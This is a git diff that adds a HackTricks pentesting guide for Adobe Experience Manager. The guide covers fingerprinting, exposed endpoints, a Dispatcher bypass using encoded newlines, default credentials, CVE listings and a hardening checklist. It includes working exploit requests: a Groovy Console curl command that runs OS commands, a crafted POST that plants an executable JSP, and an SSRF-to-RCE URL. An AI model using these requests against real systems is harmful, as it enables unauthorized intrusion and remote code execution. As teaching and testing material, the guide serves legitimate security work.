Merge pull request #1204 from HackTricks-wiki/research_update_src_network-services-pentesting_pentesting-web_aem-adobe-experience-cloud_20250729_082819

Research Update Enhanced src/network-services-pentesting/pen...

src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md

@@ -2,9 +2,121 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Find vulnerabilities and missconfigurations with [https://github.com/0ang3el/aem-hacker](https://github.com/0ang3el/aem-hacker)
+> Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR).  
+> From an attacker perspective AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched every quarter.
 
+The checklist below focuses on **externally reachable (unauth) attack surface** that keeps showing up in real engagements (2022-2025).
+
+---
+
+## 1. Fingerprinting
+
+```
+$ curl -s -I https://target | egrep -i "aem|sling|cq"
+X-Content-Type-Options: nosniff
+X-Dispatcher: hu1            # header added by AEM Dispatcher
+X-Vary: Accept-Encoding
+```
+
+Other quick indicators:
+* `/etc.clientlibs/` static path present (returns JS/CSS).  
+* `/libs/granite/core/content/login.html` login page with the “Adobe Experience Manager” banner.  
+* `</script><!--/* CQ */-->` comment at the bottom of HTML.
+
+---
+
+## 2. High-value unauthenticated endpoints
+
+Path | What you get | Notes
+---- | ------------- | -----
+`/.json`, `/.1.json` | JCR nodes via **DefaultGetServlet** | Often blocked, but *Dispatcher bypass* (see below) works.
+`/bin/querybuilder.json?path=/` | QueryBuilder API | Leak of page tree, internal paths, user names.
+`/system/console/status-*`, `/system/console/bundles` | OSGi/Felix console | 403 by default; if exposed & creds found ⇒ bundle-upload RCE.
+`/crx/packmgr/index.jsp` | Package Manager | Allows authenticated content packages → JSP payload upload.
+`/etc/groovyconsole/**` | AEM Groovy Console | If exposed → arbitrary Groovy / Java execution.
+`/libs/cq/AuditlogSearchServlet.json` | Audit logs | Information disclosure.
+`/libs/cq/ui/content/dumplibs.html` | ClientLibs dump | XSS vector.
+
+### Dispatcher bypass trick
+Most production sites sit behind the *Dispatcher* (reverse-proxy). Its filter rules can be bypassed by appending an allowed static extension **after a semicolon or encoded newline**:
+
+```
+GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
+```
+A single request like above frequently discloses user profile nodes with email addresses. P-T Partners published good guidance on this weakness. 【】
+
+---
+
+## 3. Common misconfigurations (still alive in 2025)
+
+1. **Anonymous POST servlet** – `POST /.json` with `:operation=import` lets you plant new JCR nodes.  Blocking `*.json` POST in the Dispatcher fixes it. 【】
+2. **World-readable user profiles** – default ACL grants `jcr:read` on `/home/users/**/profile/*` to everyone.
+3. **Default credentials** – `admin:admin`, `author:author`, `replication:replication`.
+4. **WCMDebugFilter** enabled ⇒ reflected XSS via `?debug=layout` (CVE-2016-7882, still found on legacy 6.4 installs).
+5. **Groovy Console exposed** – remote code execution by sending a Groovy script:
+   ```bash
+   curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
+   ```
+
+---
+
+## 4. Recent vulnerabilities (service-pack cadence)
+
+Quarter | CVE | Affected | Impact
+------- | --- | -------- | ------
+Dec 2024 | **CVE-2024-43711** | 6.5.21 and earlier | Improper input validation → **Arbitrary code execution** (requires low-priv auth). 【】
+Dec 2024 | CVE-2024-43724/26 | 6.5.21 and earlier | DOM / Stored XSS in Move Page Wizard. 【】
+Dec 2023 | CVE-2023-48452/68 | ≤ 6.5.18 | DOM-based XSS via crafted URL. 【】
+Dec 2022 | CVE-2022-30683 | ≤ 6.5.13 | Crypto design flaw → secret decryption (needs low-priv creds). 【】
+
+Always check the *APSB* bulletin matching the customer’s service-pack and request the latest **6.5.22** or *Cloud Service 2024.11*.
+
+---
+
+## 5. Exploitation snippets
+
+### 5.1 RCE via dispatcher bypass + JSP upload
+If anonymous write is possible:
+```
+# 1. Create a node that will become /content/evil.jsp
+POST /content/evil.jsp;%0aa.css HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+
+:contentType=text/plain
+jcr:data=<% out.println("pwned"); %>
+:operation=import
+```
+Now request `/content/evil.jsp` – the JSP runs with the AEM process user.
+
+### 5.2 SSRF to RCE (historical < 6.3)
+`/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console`  
+`aem_ssrf2rce.py` from **aem-hacker** automates the full chain. 【】
+
+---
+
+## 6. Tooling
+
+* **aem-hacker** – Swiss-army enumeration script, supports dispatcher bypass, SSRF detection, default-creds checks and more.  
+  ```bash
+  python3 aem_hacker.py -u https://target --host attacker-ip
+  ```【】
+* **Content Brute-force** – recursively request `/_jcr_content.(json|html)` to discover hidden components.
+* **osgi-infect** – upload malicious OSGi bundle via `/system/console/bundles` if creds available.
+
+---
+
+## 7. Hardening checklist (for your report’s recommendations)
+
+1. Keep instance on the **latest cumulative service pack** (as of Jul 2025: 6.5.22).  
+2. Remove/rotate default accounts; enforce SSO/SAML.
+3. Tighten **Dispatcher filters** – deny `;`, encoded newlines, and `*.json` or `*.querybuilder.json` for anonymous users.
+4. Disable or protect consoles (`/system/console`, `/crx/*`, `/etc/groovyconsole`) with IP allow-lists.
+5. Apply the *Anonymous Permission Hardening* package shipped by Adobe.
+
+
+
+## References
+
+* Adobe Security Bulletin APSB24-69 – “Security updates for Adobe Experience Manager (Dec 2024)”.
+* 0ang3el – aem-hacker tool (GitHub).
 {{#include ../../banners/hacktricks-training.md}}
-
-
-